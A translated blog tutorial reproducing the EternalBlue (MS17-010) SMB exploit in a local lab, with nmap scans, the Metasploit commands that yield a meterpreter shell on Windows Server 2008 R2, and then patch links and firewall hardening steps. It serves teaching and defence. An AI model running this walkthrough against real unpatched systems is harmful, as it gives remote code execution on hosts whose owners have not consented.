Foreword
Hello everyone, this is the second blog I have created in CSDN. When I was conducting practical simulations, just like everyone else, the tutorials and materials I found were all mixed. Either the articles were not high-quality, or they were not detailed, so I skipped them. Many steps caused us to encounter various obstacles in the process of actual reproduction. However, we could not find the information when searching for relevant error information. The technology of the entire security circle is only open to the circle, which is difficult to overcome. I have met a lot of friends who want to get started, so after that, I will write a blog about my own learning route, ideas for each actual combat, and problems encountered. I hope it can help everyone, and I also hope that some masters will come. Guide me and let us all make progress together.
First introduction to eternal blue
Introduction
Eternal Blue refers to the hacker group Shadow Brokers (Shadow Brokers) released a large number of network attack tools on the evening of April 14, 2017, including the “Eternal Blue” tool. “Eternal Blue” exploits the SMB vulnerability of the Windows system to Obtain the highest authority of the system. On May 12, criminals created the wannacry ransomware virus by modifying “Eternal Blue”. Many university intranets, large enterprise intranets and government agency private networks in the UK, Russia, Europe and China were infected and were extorted to pay. A high ransom is required to decrypt the recovered files.
Principle
Eternal Blue is a vulnerability that occurs when the Windows SMB service handles SMB v1 requests. This vulnerability allows attackers to execute arbitrary code on the target system. Through the Eternal Blue vulnerability, Windows machines with open 445 file sharing port will be scanned. Without any user operation, criminals can implant ransomware, remote control Trojans, virtual currency mining machines and other malware into computers and servers as long as they are turned on and connected to the Internet. program.
SMB protocol
SMB (full name is Server Message Block) is a protocol server message block. It is a client/server, request/response protocol. Files, printers, and named pipes can be shared between computers through the SMB protocol. and other resources, the Internet Neighborhood on the computer is realized by SMB; the SMB protocol works at the application layer and session layer, and can be used on top of the TCP/IP protocol. SMB uses TCP139 port and TCP445 port. If you want to study the protocol in depth, you can check out the OSI seven-layer model, which I won’t go into details in this chapter.
Attack methods
The malicious code scans Windows machines that open the 445 file sharing port. Without any user action, as long as the machine is turned on and connected to the Internet, criminals can implant ransomware, remote control Trojans, virtual currency mining machines and other malicious programs into computers and servers.
This time, the hacker used Petwarp, a variant of the Petya ransomware virus. The Eternal Blue ransomware vulnerability was still used during the attack, and the system username and password were obtained for intranet propagation.
This outbreak used network self-replication technologies such as known OFFICE vulnerabilities, Eternal Blue SMB vulnerabilities, and LAN infections, allowing the virus to explode in a short period of time. At the same time, this virus is different from ordinary ransomware in that it does not encrypt every file in the computer. Instead, it encrypts the hard drive master file table (MFT) and makes the master boot record (MBR) inoperable. The file name, size and location information on the disk is used to restrict access to the complete system, making the computer unable to boot. It is more destructive to the system than ordinary ransomware viruses.
Practical stage
Reproduce the environment layout
Target aircraft, attack aircraft, intranet environment
Target machine: Windows server 2008 R2 (no operations required, the firewall does not need to be turned off)
kali Linux, black arch Linux
The number of Eternal Blue
CVE-2017-0146
MS17-010
………….
Attack aircraft, target aircraft preparation
In order not to affect the security of the network, I chose to use the intranet environment of the Vmware virtual machine locally for actual reproduction. I personally prefer to use black arch, but considering everyone’s learning, I chose In order to use Kali for the next actual combat, the target drone system I chose is a server system that is still in use. According to the thinking of operation and maintenance engineers, it is generally not necessary to upgrade without upgrading. Patches can be applied all the time. Mainly is the need for stability. Therefore, this system is currently used for demonstration. At the end of the article, I will explain the system that suffers from the Eternal Blue vulnerability. Now let’s get into the reproduction phase:
Determine the IP of the attacking aircraft and target aircraft
ifconfig ##Linux system to view IP information
kali Linux 2023 IP: 192.168.137.186
Windows server 2008 R2 IP: 192.168.137.111
ipconfig ##View IP information on Windows system
Detect target host
We only got the IP, but we don’t know what ports and services this drone has opened. But we know that the recurrence of this experiment is the Eternal Blue vulnerability, so we can guess or scan it. Let’s scan it first< strong>The ports opened by the target and the services running.
Here I am using the nmap scanning tool, which I think is one of the easier to use among many scanning tools.
nmap -T4 -O -v -sV 192.168.137.111 parameter: -T4 ##Set the timing template, (0-5), you can understand it as the scanning speed, the larger the faster. -O ##Identification of operating system -v ##Increase the verbosity of the output information -sV ##Service identification
Scan results:
As you can see, the 445 port of the target is open, along with the following services: microsoft-ds, the target system version.
We can now carry out attacks based on the published intelligence, but we cannot rule out the possibility that some friends may say: Since we want to exploit a vulnerability, how do we know the number? Okay, let’s sweep them out!
nmap --script=vuln 192.168.137.111 -v --script ##Use script to scan vuln ##Use regular vulnerability scanning script
Scan results:
When we scanned ms17-010, the Eternal Blue vulnerability number, we were able to determine that the probability of Eternal Blue being present on the host was very high, and we began to attempt an attack.
MSF vulnerability exploitation
The commands you will use this time when using the msf framework:
msfconsole ##Start the framework search ##Search use ##Use show options ##See parameters set ##Set required items run/exploit ##Execution
Find related vulnerabilities
We start the framework, enter the msf console, and search for Eternal Blue
msfconsole
search ms17-010
Here we see that the first vulnerability module is in a usable state, and we use it.
use 0
Set required parameters
To set the parameters of this module, we must first check the parameters of this module. We only need to set the more important ones.
show options
Here, the msf console prompts that there is only one parameter that needs to be set:
RHOSTS This is the IP address of the target drone
We can add threads to it, but not too many. If the threads are too large, the drone will easily crash with a blue screen.
THREAD thread
We set the IP of the target machine and allocate threads.
set rhosts 192.168.137.111 set thread 10
Perform Attack
After setting the parameters, execute the attack.
run exploit
The [*] and [+] on the left are status codes. As long as [-] is not displayed, you can basically invade successfully.
In some cases, there will be a lot of minus signs, and there will be an error message with the word FAIL in the middle. Generally, you don’t need to worry about it. If the hack doesn’t work, just change the number of threads (I solved it this way, but it’s obviously just a coincidence, I don’t know about other situations)
Seeing this console pop up means you successfully entered the drone.
meterpreter> ps ##View the progress of the target machine
After entering the shell, you can obtain the command running environment of the target target machine.
shell
System scope affected by EternalBlue vulnerability
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server2008 R2
Windows 8.1
Windows10
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Reinforcement plan
1. Download the vulnerability patch provided by Microsoft
Click here to jump to text, or search accurately in the list below:
①Install the latest patches, download all patches affected by the vulnerability, and mark them accordingly. Note: Check the current Windows version before installing the patch (right-click “My Computer” and select “Properties”)
Product (Down-level) Release Date CDN Link Security Update for Windows Server 2003 for x64-based Systems (KB4012598) 5/13/2017 http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe Security Update for Windows 8 for x64-based Systems (KB4012598) 5/13/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu Security Update for Windows 8 (KB4012598) 5/13/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu Security Update for Windows XP SP3 for XPe (KB4012598) 5/13/2017 http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe Security Update for Windows XP SP3 (KB4012598) 5/13/2017 http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe Security Update for Windows Server 2003 (KB4012598) 5/13/2017 http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe Security Update for Windows XP SP2 for x64-based Systems (KB4012598) 5/13/2017 http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe Security Update for Windows Vista (KB4012598) - Windows Vista 3/14/2017 http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe Security Update for Windows Server 2008 (KB4012598) - Windows Server 2008 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-x86_13e9b3d77ba5599764c296075a796c16a85c745c.msu Security Update for Windows Vista for x64-based Systems (KB4012598) - Windows Vista 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-x64_6a186ba2b2b98b2144b50f88baf33a5fa53b5d76.msu Security Update for Windows Server 2008 for Itanium-based Systems (KB4012598) - Windows Server 2008 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-ia64_83a6f5a70588b27623b11c42f1c8124a25d489de.msu Security Update for Windows Server 2008 for x64-based Systems (KB4012598) - Windows Server 2008 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-x64_6a186ba2b2b98b2144b50f88baf33a5fa53b5d76.msu Security Update for WES09 and POSReady 2009 (KB4012598) - Windows XP Embedded 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windowsxp-kb4012598-x86-embedded-enu_9515c11bc77e39695b83cb6f0e41119387580e30.exe March, 2017 Security Only Quality Update for Windows 7 for x64-based Systems (KB4012212) 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu March, 2017 Security Only Quality Update for Windows 7 (KB4012212) 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu March, 2017 Security Only Quality Update for Windows Embedded Standard 7 (KB4012212) 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu March, 2017 Security Only Quality Update for Windows Embedded Standard 7 for x64-based Systems (KB4012212) 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu March, 2017 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB4012212) 3/14/2017 http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu March, 2017 Security Only Quality Update for Windows Server 2008 R2 for Itanium-based Systems (KB4012212) 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-ia64_93a42b16dbea87fa04e2b527676a499f9fbba554.msu March, 2017 Security Only Quality Update for Windows 8.1 (KB4012213) - Windows 8.1 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x86_e118939b397bc983971c88d9c9ecc8cbec471b05.msu March, 2017 Security Only Quality Update for Windows 8.1 for x64-based Systems (KB4012213) -Windows 8.1 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x64_5b24b9ca5a123a844ed793e0f2be974148520349.msu March, 2017 Security Only Quality Update for Windows Server 2012 R2 (KB4012213) -Windows Server 2012 R2 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x64_5b24b9ca5a123a844ed793e0f2be974148520349.msu March, 2017 Security Only Quality Update for Windows Embedded 8 Standard (KB4012214) 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8-rt-kb4012214-x86_5e7e78f67d65838d198aa881a87a31345952d78e.msu March, 2017 Security Only Quality Update for Windows Embedded 8 Standard for x64-based Systems (KB4012214) 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8-rt-kb4012214-x64_b14951d29cb4fd880948f5204d54721e64c9942b.msu March, 2017 Security Only Quality Update for Windows Server 2012 (KB4012214) 3/14/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8-rt-kb4012214-x64_b14951d29cb4fd880948f5204d54721e64c9942b.msu \t \t Most current Windows 10 cumulative updates - May 2017 \t Windows 10 \t 2017-05 Cumulative Update for Windows 10 for x64-based Systems (KB4019474) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019474-x64_4ed033d1c2af2daea1298d10da1fad15a482f726.msu 2017-05 Cumulative Update for Windows 10 for x86-based Systems (KB4019474) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019474-x86_259adeed4a4037f749afab211ff1bc6a771ff7f6.msu \t \t Windows 10 Version 1511 \t 2017-05 Cumulative Update for Windows 10 Version 1511 (KB4019473) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019473-x86_5e2b7bce2f1b116288b4f1f78449c66ecc7c7a53.msu 2017-05 Cumulative Update for Windows 10 Version 1511 for x64-based Systems (KB4019473) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019473-x64_c23b6f55caf1b9d6c14161b66fe9c9dfb4ad475c.msu \t \t Windows 10 Version 1607 & Windows Server 2016 \t 2017-05 Cumulative Update for Windows Server 2016 for x64-based Systems (KB4019472) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019472-x64_dda304140351259fcf15ca7b1f5b51cb60445a0a.msu 2017-05 Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4019472) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019472-x64_dda304140351259fcf15ca7b1f5b51cb60445a0a.msu 2017-05 Cumulative Update for Windows 10 Version 1607 for x86-based Systems (KB4019472) 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019472-x86_9bf106e898b57c20917cd98fd8b8d250333015a5.msu \t \t Windows 10 Version 1703 \t 2017-05 Cumulative Update for Windows 10 Version 1703 for x64-based Systems (KB4016871) -Windows 10 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4016871-x64_27dfce9dbd92670711822de2f5f5ce0151551b7d.msu 2017-05 Cumulative Update for Windows 10 Version 1703 for x86-based Systems (KB4016871) -Windows 10 5/9/2017 http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4016871-x86_5901409e58d1c6c9440e420d99c42b08f227356e.msu
2. Manual repair and reinforcement
I won’t show you pictures here, just watch the operation.
Disable server service
Click Start, and then click Control Panel (or point to Settings, and then click Control Panel)
Double-click “Administrative Tools”
Double-click “Services”
Double-click “Server”
In the Startup type list, click Disabled
Click Stop and then OK
Block TCP ports 135, 137, 138, 139 and 445 at the firewall
Windows XP system, use the network installation wizard to enable Windows Firewall Click Start, then Control Panel Double-click "Network Connections" and then click "Change Window Firewall Settings." On the General tab, make sure Enable (recommended) is selected. This will enable Windows Firewall. After enabling Windows Firewall, select "Don't allow exceptions" to block all incoming traffic.
Windows Server 2003 system, use the network installation wizard to enable Windows Firewall Click "Start" and then click "Control Panel" In the default Category View, click Network and Internet Connections, and then click Network Connections. Right-click the connection for which you want to enable Internet Connection Firewall and click Properties Click the Advanced tab. Select the "Protect my computer or network by restricting or blocking access to this computer from the Internet" checkbox Then click OK.
For Windows Vista or above, use the network installation wizard to enable Windows Firewall Click "Start", then click "Control Panel"; Click "Windows Firewall" to configure Windows Firewall; Click "Turn Windows Firewall on or off" to define the firewall settings for each type of network; Turn Windows Firewall on or off for private or public networks; Click "Advanced Settings" >> Inbound Rules >> New Rule; Select port and next step; In the specific local port, enter the port number that needs to be closed, 445, 135, 137, 138, 139, next step; Select Block connection, next step; Configuration file, select all, next step; You can enter any name you want and just finish.
End
Okay, the above is the content of this blog. I hope it can be helpful to everyone (if you don’t like it, please don’t complain). Keep a heart of open source technology and let us make progress together! !